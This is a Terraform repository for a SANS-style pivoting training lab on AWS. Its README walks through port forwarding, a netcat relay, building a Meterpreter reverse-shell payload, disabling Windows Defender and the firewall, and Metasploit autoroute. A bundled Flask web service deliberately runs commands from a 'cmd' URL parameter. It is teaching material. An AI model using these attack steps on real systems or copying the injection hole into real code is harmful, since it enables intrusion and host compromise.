├── .gitignore ├── Readme.md ├── assets ├── hosts ├── webserve.py └── webserve.service ├── main.tf ├── outputs.tf ├── scripts ├── linux-attack.yaml ├── linux-pivot.yaml ├── linux-target.yaml └── windows-pivot.yaml └── variables.tf /.gitignore: -------------------------------------------------------------------------------- 1 | # Local .terraform directories 2 | **/.terraform/* 3 | 4 | # .tfstate files 5 | *.tfstate 6 | *.tfstate.* 7 | 8 | # .terraform lock files 9 | .terraform.lock.* 10 | 11 | # Crash log files 12 | crash.log 13 | 14 | # Ignore any .tfvars files that are generated automatically for each Terraform run. Most 15 | # .tfvars files are managed as part of configuration and so should be included in 16 | # version control. 17 | # 18 | # example.tfvars 19 | 20 | # Ignore override files as they are usually used to override resources locally and so 21 | # are not checked in 22 | override.tf 23 | override.tf.json 24 | *_override.tf 25 | *_override.tf.json 26 | 27 | # Include override files you do wish to add to version control using negated pattern 28 | # 29 | # !example_override.tf 30 | 31 | # Include tfplan files to ignore the plan output of command: terraform plan -out=tfplan 32 | # example: *tfplan* 33 | -------------------------------------------------------------------------------- /Readme.md: -------------------------------------------------------------------------------- 1 | # SANS Pivot Cheat Sheet Lab 2 | This serves as a tool for cybersecurity enthusiasts to better understand pivoting through an environment. The central reference is the [SANS Pivot Cheat Sheet](https://www.sans.org/posters/pivot-cheat-sheet/). Some code used from Terraform's [HashiCorp Learn platform](https://learn.hashicorp.com/tutorials/terraform/cloud-init?in=terraform/provision). There's also a free [SANS webcast](https://www.sans.org/webcasts/getting-the-most-out-of-the-sans-pivot-cheat-sheet-2022/) using this repo and covering the cheat sheet. Enjoy! 3 | 4 | ## Dependencies 5 | - [AWS IAM Credentials](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html) to interact with an AWS account 6 | - [AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/getting-started-install.html) installed 7 | - [Terraform](https://www.terraform.io/downloads.html) installed 8 | 9 | ## Files 10 | - Readme.md: This file explains the repository 11 | - main.tf: Overall architecture of the Terraform project 12 | - variables.tf: Contains values used in production 13 | - output.tf: Defines outputs requested from the build 14 | - scripts/: YAML config files for instances 15 | - assets/: Files copied to instances 16 | 17 | ## Setup Steps 18 | ### Create Keys and Apply to YAML Configs 19 | - `ssh-keygen -t rsa -C "your_email@example.com" -f ../tf-cloud-init` 20 | - Look for `ssh_authorized_keys:` in the YAML files in `scripts/`. Replace the example public keys with the contents of your new `tf-cloud-init.pub`. One-liner: 21 | - `sed -i "s:ssh-rsa.*$:$(cat ../tf-cloud-init.pub|tr -d '\n'):" ./scripts/*yaml` 22 | 23 | ### Set Default AWS Credentials 24 | - Check to see what you have in your `~/.aws/credentials` file: 25 | - `cat ~/.aws/credentials` 26 | - Set your current shell to use the right set: 27 | - `export AWS_PROFILE=Your-Favorite-IAM` 28 | 29 | ### Create the Range with Terraform 30 | ``` 31 | $ terraform init 32 | [...] 33 | Terraform has been successfully initialized! 34 | [...] 35 | $ terraform fmt 36 | $ terraform validate 37 | Success! The configuration is valid. 38 | $ terraform apply 39 | [...] 40 | Do you want to perform these actions? 41 | Terraform will perform the actions described above. 42 | Only 'yes' will be accepted to approve. 43 | 44 | Enter a value: yes 45 | [...] 46 | Apply complete! Resources: 11 added, 0 changed, 0 destroyed. 47 | 48 | Outputs: 49 | 50 | linux_attack_private_ip = "10.1.1.1" 51 | linux_attack_public_ip = "18.19.20.21" 52 | linux_pivot_private_ip = "10.1.2.1" 53 | linux_pivot_public_ip = "3.4.5.6" 54 | linux_target_private_ip = "10.1.3.1" 55 | linux_target_public_ip = "1.3.3.7" 56 | sg_pivot = "sg-0123456789abcdef0" 57 | vpc = "vpc-0123456789abcdef0" 58 | $ terraform show #optional - to show assets and addresses again 59 | ``` 60 | 61 | ### Optionally: Create a Windows Instance as Another Pivot 62 | - From the AWS Console, Launch Instances 63 | - Name it _Windows-Pivot_ 64 | - Optional: add a tag like "Project:PivotPlay" 65 | - Pick a Windows AMI - maybe Server 2022 (ami-0b9fc4f4583318dff) 66 | - Next, then _t2micro_ is probably OK 67 | - Create a new key and **save** them; I'll call mine _pivot-labz_ 68 | - Next, then VPC from the Terraform output 69 | - Set Auto-Assign public IP to _Enable_ 70 | - Pick the _sg\_pivot_ security group 71 | - Under Advanced network configuration, set Primary IP addresses to _10.1.2.2_ 72 | - Review, then _Launch instance_ 73 | - Once the new instance is up, select it in the Instances view and Connect using the key you just created to get the password 74 | - Optionally, you can do this with the AWS CLI: 75 | - `aws ec2 create-key-pair --key-name pivot-labz --region us-east-2` 76 | - Save the private key to something like `../pivot-labz.pem` so you can get the instance password later 77 | - `aws ec2 describe-subnets --region us-east-2` # to get the subnet-id for the next command 78 | - `aws ec2 run-instances --image-id ami-0b9fc4f4583318dff --count 1 --instance-type t2.micro --key-name pivot-labz --security-group-ids sg-0123456789abcdef0 --subnet-id subnet-6e7f829e --region us-east-2` 79 | - Noting the instance-id created, get the password with `aws ec2 get-password-data --instance-id i-0123456789abcdef0 --priv-launch-key ../pivot-labz.pem --region us-east-2` 80 | - Then RDP in! `mstsc.exe`, connect as Administrator with your random password. 81 | 82 | ### Optional Windows Steps 83 | - Install chocolatey package manager: `Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))` 84 | - Install Nmap or other tools: `choco install nmap` 85 | - Update the hosts file: `notepad.exe C:\Windows\System32\drivers\etc\hosts` 86 | ``` 87 | 10.1.1.1 linux-attack 88 | 10.1.2.1 linux-pivot 89 | 10.1.2.2 windows-pivot 90 | 10.1.3.1 linux-target 91 | ``` 92 | 93 | ### Connect to the Attack Machine with the IP from the Terraform Output 94 | - `ssh attack@AttackIPHere -i ../tf-cloud-init` 95 | - If you've lost track of those IPs, just `terraform show` to see them again 96 | 97 | ### Confirm You _Can't_ Get to the Target 98 | - attack $ `nmap 10.1.2.1 10.1.3.1` or `nmap linux-pivot linux-target` 99 | - attack $ `curl linux-pivot` # succeeds! 100 | - attack $ `curl linux-target` # fails )-: 101 | 102 | ## Attack! 103 | 104 | ### Local Port Forward 105 | - `scp -i ../tf-cloud-init ../tf-cloud-init attack@AttackIPHere:~/.ssh` # copy private key to the attack host 106 | - `ssh -i ../tf-cloud-init attack@AttackIPHere` # connect to the attack host 107 | - attack $ `ssh -i .ssh/tf-cloud-init pivot@linux-pivot` # verify you have access the the pivot host 108 | - pivot $ `exit` 109 | - attack $ `ssh -i .ssh/tf-cloud-init -fNL 1337:linux-target:80 pivot@linux-pivot` 110 | - attack $ `curl localhost:1337` # success! 111 | 112 | ### Dynamic Port Forward 113 | - attack $ `ssh -i .ssh/tf-cloud-init -D 9050 -fN pivot@linux-pivot` 114 | - attack $ `proxychains curl linux-target` # success! 115 | 116 | ### Netcat Port Forward 117 | - attack $ `tmux` 118 | - attack $ \b " 119 | - attack $ `ssh -i .ssh/tf-cloud-init pivot@linux-pivot` 120 | - pivot $ `mkfifo backpipe` 121 | - pivot $ `nc -lvp 2000 0backpipe` 122 | - attack $ \b \ 123 | - attack $ `curl linux-pivot:2000` # success! 124 | 125 | ### Roll Meterpreter on Windows 126 | - attack $ `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=8888 -f exe -o helper.exe` # create a payload 127 | - attack $ `python3 -m http.server 8000` # serve it up; -c later to end 128 | - pivot PS> `Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend` # disable Defender 129 | - pivot PS> `netsh advfirewall set allprofiles state off` # disable the host firewall 130 | - pivot PS> `curl 10.1.1.1:8000/helper.exe -OutFile helper.exe` # grab the malware 131 | - Build a resource file on attack $ `cat << EOF > catch8888.rc` 132 | ``` 133 | use exploit/multi/handler 134 | set payload windows/x64/meterpreter/reverse_tcp 135 | set LHOST eth0 136 | set LPORT 8888 137 | run 138 | EOF 139 | ``` 140 | - attack $ `msfconsole -r catch8888.rc` # start up Metasploit to catch the payload 141 | - pivot PS> `.\helper.exe` # exploit yourself! 142 | 143 | ### Autoroute 144 | - meterpreter > `background` 145 | ``` 146 | [*] Backgrounding session 1... 147 | ``` 148 | - msf6 > `use post/multi/manage/autoroute` 149 | - msf6 post(multi/manage/autoroute) > `set subnet 10.1.3.0` 150 | - msf6 post(multi/manage/autoroute) > `set session 1` # or whatever your Meterpreter session number is 151 | - msf6 post(multi/manage/autoroute) > `run` 152 | - msf6 post(multi/manage/autoroute) > `use auxiliary/scanner/portscan/tcp` # and now to check that it works! 153 | - msf6 auxiliary(scanner/portscan/tcp) > `set RHOSTS linux-target` 154 | - msf6 auxiliary(scanner/portscan/tcp) > `set PORTS 80` 155 | - msf6 auxiliary(scanner/portscan/tcp) > `run` 156 | ``` 157 | [+] 10.1.3.1: - 10.1.3.1:80 - TCP OPEN # success! 158 | ``` 159 | 160 | ## Tear Down Steps 161 | - Go into AWS EC2, switch to the correct region, and terminate any Windows instances. 162 | ``` 163 | $ terraform destroy 164 | [...] 165 | Do you really want to destroy all resources? 166 | Terraform will destroy all your managed infrastructure, as shown above. 167 | There is no undo. Only 'yes' will be accepted to confirm. 168 | 169 | Enter a value: yes 170 | [...] 171 | Destroy complete! Resources: 11 destroyed. 172 | $ terraform show #optional - to show assets and addresses again 173 | ``` 174 | -------------------------------------------------------------------------------- /assets/hosts: -------------------------------------------------------------------------------- 1 | 10.1.1.1 linux-attack 2 | 10.1.2.1 linux-pivot 3 | 10.1.2.2 windows-pivot 4 | 10.1.3.1 linux-target 5 | -------------------------------------------------------------------------------- /assets/webserve.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request 2 | import os 3 | 4 | app = Flask(__name__) # define app 5 | stream = os.popen('ls /home/') 6 | hostname = stream.read() 7 | 8 | @app.route("/", methods=["GET","POST"]) 9 | def index(): 10 | sourceIP = request.remote_addr 11 | if 'cmd' in request.args: 12 | injection = os.popen(request.args.get('cmd')).read() 13 | else: 14 | injection = "" 15 | code = f""" 16 | Intranet Site 17 |

Company Page on {hostname}

18 |

You are visiting from {sourceIP}. Welcome!

19 |

{injection}

20 | 21 | """ 22 | return code 23 | 24 | if __name__ == "__main__": 25 | app.run(host='0.0.0.0', port=80, debug=True, threaded=True) 26 | -------------------------------------------------------------------------------- /assets/webserve.service: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=Insecure Python3 Web Service 3 | After=network.target auditd.service 4 | StartLimitIntervalSec=0 5 | 6 | [Service] 7 | ExecStart=/usr/bin/python3 /opt/webserve.py 8 | ExecReload=/bin/kill -HUP $MAINPID 9 | KillMode=process 10 | Restart=on-failure 11 | RestartSec=1 12 | Type=simple 13 | 14 | [Install] 15 | WantedBy=multi-user.target 16 | Alias=webserve.service 17 | -------------------------------------------------------------------------------- /main.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_version = ">= 0.13" 3 | required_providers { 4 | aws = { 5 | source = "hashicorp/aws" 6 | version = "~> 3.0" 7 | } 8 | } 9 | } 10 | 11 | 12 | provider "aws" { 13 | region = var.region 14 | } 15 | 16 | data "aws_ami" "ubuntu" { 17 | most_recent = true 18 | 19 | filter { 20 | name = "name" 21 | values = ["ubuntu/images/hvm-ssd/ubuntu-*20*-amd64-server-*"] 22 | } 23 | 24 | filter { 25 | name = "virtualization-type" 26 | values = ["hvm"] 27 | } 28 | 29 | owners = ["099720109477"] # Canonical 30 | } 31 | 32 | resource "aws_vpc" "vpc" { 33 | cidr_block = var.cidr_vpc 34 | enable_dns_support = true 35 | enable_dns_hostnames = true 36 | } 37 | 38 | resource "aws_internet_gateway" "igw" { 39 | vpc_id = aws_vpc.vpc.id 40 | } 41 | 42 | resource "aws_subnet" "subnet_public" { 43 | vpc_id = aws_vpc.vpc.id 44 | cidr_block = var.cidr_subnet 45 | } 46 | 47 | resource "aws_route_table" "rtb_public" { 48 | vpc_id = aws_vpc.vpc.id 49 | 50 | route { 51 | cidr_block = "0.0.0.0/0" 52 | gateway_id = aws_internet_gateway.igw.id 53 | } 54 | } 55 | 56 | resource "aws_route_table_association" "rta_subnet_public" { 57 | subnet_id = aws_subnet.subnet_public.id 58 | route_table_id = aws_route_table.rtb_public.id 59 | } 60 | 61 | resource "aws_security_group" "sg_pivot" { 62 | name = "sg_pivot" 63 | vpc_id = aws_vpc.vpc.id 64 | 65 | # Let it rip 66 | ingress { 67 | from_port = 0 68 | to_port = 0 69 | protocol = "-1" 70 | cidr_blocks = ["0.0.0.0/0"] 71 | } 72 | 73 | egress { 74 | from_port = 0 75 | to_port = 0 76 | protocol = "-1" 77 | cidr_blocks = ["0.0.0.0/0"] 78 | } 79 | } 80 | 81 | resource "aws_security_group" "sg_attack" { 82 | name = "sg_attack" 83 | vpc_id = aws_vpc.vpc.id 84 | 85 | # Let it rip 86 | ingress { 87 | from_port = 0 88 | to_port = 0 89 | protocol = "-1" 90 | cidr_blocks = ["0.0.0.0/0"] 91 | } 92 | 93 | egress { 94 | from_port = 0 95 | to_port = 0 96 | protocol = "-1" 97 | cidr_blocks = ["0.0.0.0/0"] 98 | } 99 | } 100 | 101 | resource "aws_security_group" "sg_target" { 102 | name = "sg_target" 103 | vpc_id = aws_vpc.vpc.id 104 | 105 | # Let it rip 106 | ingress { 107 | from_port = 0 108 | to_port = 0 109 | protocol = "-1" 110 | cidr_blocks = ["10.1.2.0/23"] 111 | } 112 | 113 | egress { 114 | from_port = 0 115 | to_port = 0 116 | protocol = "-1" 117 | cidr_blocks = ["0.0.0.0/0"] 118 | } 119 | } 120 | 121 | data "template_file" "linux_attack_data" { 122 | template = file("./scripts/linux-attack.yaml") 123 | } 124 | 125 | resource "aws_instance" "linux_attack" { 126 | ami = data.aws_ami.ubuntu.id 127 | instance_type = "t2.micro" 128 | subnet_id = aws_subnet.subnet_public.id 129 | vpc_security_group_ids = [aws_security_group.sg_attack.id] 130 | associate_public_ip_address = true 131 | user_data = data.template_file.linux_attack_data.rendered 132 | private_ip = "10.1.1.1" 133 | 134 | tags = { 135 | Name = "Linux-Attack" 136 | Project = "PivotPlay" 137 | } 138 | } 139 | 140 | data "template_file" "linux_pivot_data" { 141 | template = file("./scripts/linux-pivot.yaml") 142 | } 143 | 144 | resource "aws_instance" "linux_pivot" { 145 | ami = data.aws_ami.ubuntu.id 146 | instance_type = "t2.micro" 147 | subnet_id = aws_subnet.subnet_public.id 148 | vpc_security_group_ids = [aws_security_group.sg_pivot.id] 149 | associate_public_ip_address = true 150 | user_data = data.template_file.linux_pivot_data.rendered 151 | private_ip = "10.1.2.1" 152 | 153 | tags = { 154 | Name = "Linux-Pivot" 155 | Project = "PivotPlay" 156 | } 157 | } 158 | 159 | data "template_file" "linux_target_data" { 160 | template = file("./scripts/linux-target.yaml") 161 | } 162 | 163 | resource "aws_instance" "linux_target" { 164 | ami = data.aws_ami.ubuntu.id 165 | instance_type = "t2.micro" 166 | subnet_id = aws_subnet.subnet_public.id 167 | vpc_security_group_ids = [aws_security_group.sg_target.id] 168 | associate_public_ip_address = true 169 | user_data = data.template_file.linux_target_data.rendered 170 | private_ip = "10.1.3.1" 171 | # provisioner "file" { 172 | # source = "./assets/webserve.py" 173 | # destination = "/tmp/webserve2.py" 174 | # connection { 175 | # type = "ssh" 176 | # user = "target" 177 | # private_key = file("../tf-cloud-init") 178 | # host = aws_instance.linux_target.public_ip 179 | # } 180 | # } 181 | 182 | tags = { 183 | Name = "Linux-Target" 184 | Project = "PivotPlay" 185 | } 186 | } 187 | 188 | # data "template_file" "windows_pivot_data" { 189 | # template = file("./scripts/windows-pivot.yaml") 190 | # } 191 | # 192 | # resource "aws_instance" "windows_pivot" { 193 | # ami = "ami-0f8a21019cb8e9c33" 194 | # instance_type = "t2.micro" 195 | # subnet_id = aws_subnet.subnet_public.id 196 | # vpc_security_group_ids = [aws_security_group.sg_pivot.id] 197 | # associate_public_ip_address = true 198 | # user_data = data.template_file.windows_pivot_data.rendered 199 | # private_ip = "10.1.2.2" 200 | # tags = { 201 | # Name = "Windows-Target" 202 | # Project = "PivotPlay" 203 | # } 204 | # } 205 | -------------------------------------------------------------------------------- /outputs.tf: -------------------------------------------------------------------------------- 1 | output "linux_attack_public_ip" { 2 | description = "Linux attack box public IP address" 3 | value = aws_instance.linux_attack.public_ip 4 | } 5 | 6 | output "linux_attack_private_ip" { 7 | description = "Linux attack box private IP address" 8 | value = aws_instance.linux_attack.private_ip 9 | } 10 | 11 | output "linux_pivot_public_ip" { 12 | description = "Linux pivot box public IP address" 13 | value = aws_instance.linux_pivot.public_ip 14 | } 15 | 16 | output "linux_pivot_private_ip" { 17 | description = "Linux pivot box private IP address" 18 | value = aws_instance.linux_pivot.private_ip 19 | } 20 | 21 | output "linux_target_public_ip" { 22 | description = "Linux target box public IP address" 23 | value = aws_instance.linux_target.public_ip 24 | } 25 | 26 | output "linux_target_private_ip" { 27 | description = "Linux target box private IP address" 28 | value = aws_instance.linux_target.private_ip 29 | } 30 | 31 | output "sg_pivot" { 32 | description = "Pivot Security Group" 33 | value = aws_security_group.sg_pivot.id 34 | } 35 | 36 | output "vpc" { 37 | description = "Pivot Range VPC" 38 | value = aws_vpc.vpc.id 39 | } 40 | 41 | # output "windows_pivot_public_ip" { 42 | # description = "Windows pivot box public IP address" 43 | # value = aws_instance.windows_pivot.public_ip 44 | # } 45 | -------------------------------------------------------------------------------- /scripts/linux-attack.yaml: -------------------------------------------------------------------------------- 1 | #cloud-config 2 | # Add groups to the system 3 | # Adds the ubuntu group with members 'root' and 'sys' 4 | # and the empty group hashicorp. 5 | groups: 6 | - ubuntu: [root,sys] 7 | - attack 8 | 9 | # Add users to the system. Users are added after groups are added. 10 | users: 11 | - default 12 | - name: attack 13 | gecos: attack 14 | shell: /bin/bash 15 | primary_group: attack 16 | sudo: ALL=(ALL) NOPASSWD:ALL 17 | groups: users, admin 18 | lock_passwd: false 19 | ssh_authorized_keys: 20 | - ssh-rsa YourPublicKeyHere 21 | 22 | # Supposed to download packages but doesn't 23 | packages: 24 | - ncat nmap 25 | # - golang-go 26 | 27 | write_files: 28 | - content: ${filebase64("./assets/hosts")} 29 | encoding: b64 30 | owner: root:root 31 | path: /etc/hosts 32 | permissions: '0644' 33 | 34 | # Set up asset 35 | runcmd: 36 | - whoami > /tmp/who.txt 37 | - sudo apt -y install nmap ncat python3 net-tools proxychains socat 38 | - sudo sed -i "s/#GatewayPorts no/GatewayPorts yes/" /etc/ssh/sshd_config 39 | - sudo systemctl restart sshd.service 40 | - curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ 41 | - chmod 755 msfinstall && \ 42 | - sudo ./msfinstall 43 | - rm msfinstall 44 | 45 | # - sudo su terraform 46 | # - sudo mkdir /home/terraform/go 47 | # - sudo chown terraform:hashicorp /home/terraform/go 48 | # - export GOPATH=/home/terraform/go 49 | # - go get github.com/hashicorp/learn-go-webapp-demo 50 | -------------------------------------------------------------------------------- /scripts/linux-pivot.yaml: -------------------------------------------------------------------------------- 1 | #cloud-config 2 | # Add groups to the system 3 | # Adds the ubuntu group with members 'root' and 'sys' 4 | # and the empty group hashicorp. 5 | groups: 6 | - ubuntu: [root,sys] 7 | - pivot 8 | 9 | # Add users to the system. Users are added after groups are added. 10 | users: 11 | - default 12 | - name: pivot 13 | gecos: pivot 14 | shell: /bin/bash 15 | primary_group: pivot 16 | sudo: ALL=(ALL) NOPASSWD:ALL 17 | groups: users, admin 18 | lock_passwd: false 19 | ssh_authorized_keys: 20 | - ssh-rsa YourPublicKeyHere 21 | 22 | # Supposed to download packages but doesn't 23 | packages: 24 | - ncat nmap 25 | # - golang-go 26 | 27 | write_files: 28 | - content: ${filebase64("./assets/hosts")} 29 | encoding: b64 30 | owner: root:root 31 | path: /etc/hosts 32 | permissions: '0644' 33 | - content: ${filebase64("./assets/webserve.py")} 34 | encoding: b64 35 | owner: root:root 36 | path: /opt/webserve.py 37 | permissions: '0755' 38 | - content: ${filebase64("./assets/webserve.service")} 39 | encoding: b64 40 | owner: root:root 41 | path: /etc/systemd/system/webserve.service 42 | permissions: '0755' 43 | 44 | # Set up asset 45 | runcmd: 46 | - whoami > /tmp/who.txt 47 | - sudo apt -y install nmap ncat python3 python3-pip net-tools socat 48 | - sudo pip3 install flask --upgrade 49 | - sudo sed -i "s/#GatewayPorts no/GatewayPorts yes/" /etc/ssh/sshd_config 50 | - sudo systemctl restart sshd.service 51 | - sudo systemctl enable webserve.service 52 | - sudo systemctl start webserve.service 53 | -------------------------------------------------------------------------------- /scripts/linux-target.yaml: -------------------------------------------------------------------------------- 1 | #cloud-config 2 | # Add groups to the system 3 | # Adds the ubuntu group with members 'root' and 'sys' 4 | # and the empty group hashicorp. 5 | groups: 6 | - ubuntu: [root,sys] 7 | - target 8 | 9 | # Add users to the system. Users are added after groups are added. 10 | users: 11 | - default 12 | - name: target 13 | gecos: target 14 | shell: /bin/bash 15 | primary_group: target 16 | sudo: ALL=(ALL) NOPASSWD:ALL 17 | groups: users, admin 18 | lock_passwd: false 19 | ssh_authorized_keys: 20 | - ssh-rsa YourPublicKeyHere 21 | 22 | # Supposed to download packages but doesn't 23 | packages: 24 | - ncat nmap 25 | # - golang-go 26 | 27 | write_files: 28 | - content: ${filebase64("./assets/hosts")} 29 | encoding: b64 30 | owner: root:root 31 | path: /etc/hosts 32 | permissions: '0644' 33 | - content: ${filebase64("./assets/webserve.py")} 34 | encoding: b64 35 | owner: root:root 36 | path: /opt/webserve.py 37 | permissions: '0755' 38 | - content: ${filebase64("./assets/webserve.service")} 39 | encoding: b64 40 | owner: root:root 41 | path: /etc/systemd/system/webserve.service 42 | permissions: '0755' 43 | 44 | # Set up asset 45 | runcmd: 46 | - whoami > /tmp/who.txt 47 | - sudo apt -y install nmap ncat python3 python3-pip net-tools 48 | - sudo pip3 install flask --upgrade 49 | - sudo sed -i "s/#GatewayPorts no/GatewayPorts yes/" /etc/ssh/sshd_config 50 | - sudo systemctl restart sshd.service 51 | - sudo systemctl enable webserve.service 52 | - sudo systemctl start webserve.service 53 | - echo "Hacking for cash monies!" > /opt/secrets.txt 54 | 55 | -------------------------------------------------------------------------------- /scripts/windows-pivot.yaml: -------------------------------------------------------------------------------- 1 | #cloud-config 2 | # Add groups to the system 3 | # Adds the ubuntu group with members 'root' and 'sys' 4 | # and the empty group hashicorp. 5 | groups: 6 | - ubuntu: [root,sys] 7 | - pivot 8 | 9 | # Add users to the system. Users are added after groups are added. 10 | users: 11 | - default 12 | - name: pivot 13 | gecos: pivot 14 | shell: /bin/bash 15 | primary_group: pivot 16 | groups: users, admin 17 | lock_passwd: false 18 | ssh_authorized_keys: 19 | - ssh-rsa YourPublicKeyHere 20 | 21 | # Downloads the golang package 22 | packages: 23 | - ncat nmap 24 | # - golang-go 25 | 26 | write_files: 27 | - content: | 28 | 10.1.1.1 linux-attack 29 | 10.1.2.1 linux-pivot 30 | 10.1.2.2 windows-pivot 31 | 10.1.3.1 linux-target 32 | owner: root:root 33 | path: \windows\system32\drivers\etc\hosts 34 | 35 | 36 | 37 | 38 | # Set up asset 39 | runcmd: 40 | - whoami > \who.txt 41 | -------------------------------------------------------------------------------- /variables.tf: -------------------------------------------------------------------------------- 1 | variable "cidr_vpc" { 2 | description = "CIDR block for the VPC" 3 | default = "10.1.0.0/16" 4 | } 5 | 6 | variable "cidr_subnet" { 7 | description = "CIDR block for the subnet" 8 | default = "10.1.0.0/18" 9 | } 10 | 11 | variable "region" { 12 | description = "The region Terraform deploys your instance" 13 | default = "us-east-2" 14 | } 15 | --------------------------------------------------------------------------------